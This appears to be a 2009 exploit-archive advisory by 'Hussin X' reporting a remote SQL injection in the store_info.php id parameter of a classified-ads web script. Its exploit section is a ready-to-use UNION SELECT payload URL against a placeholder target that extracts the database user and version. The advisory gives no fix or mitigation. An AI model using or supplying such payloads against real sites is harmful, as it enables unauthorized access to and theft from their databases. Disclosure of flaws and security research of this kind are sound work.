1 |___________________________________________________
2 |
3 | Classified Ads Scrip ( store_info.php id) Remote SQL Injection Vulnerability
4 |
5 |___________________________________________________
6 |−−−−−−−−−−−−−−−−−−−− Hussin X −−−−−−−−−−−−−−−−−−−
7 |
8 | Author: Hussin X
9 |
10 | Home : WwW.IQ−ty.CoM<http://WwW.IQ−ty.CoM>
11 |
12 | email: darkangel_g85[at]Yahoo[DoT]com
13 |
14 |___________________________________________________
15 |
16 | script : http://www.pozscripts.com/product_details.php?item_id=5
17 |
18 | DorK : :)
19 |___________________________________________________
20
21 Exploit:
22 ________
23
24
25
26 www.[target].com/Script/store_info.php?id=−9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(user(),0x3e,v
ersion()),18,19,20,21,22,23−−
27
28
29
30 IQ−SecuritY FoRuM
31
Page 1/1
Classified Ads Scrip store_info.php id Remote SQL Injection Vulnerability
Hussin X
12/31/2009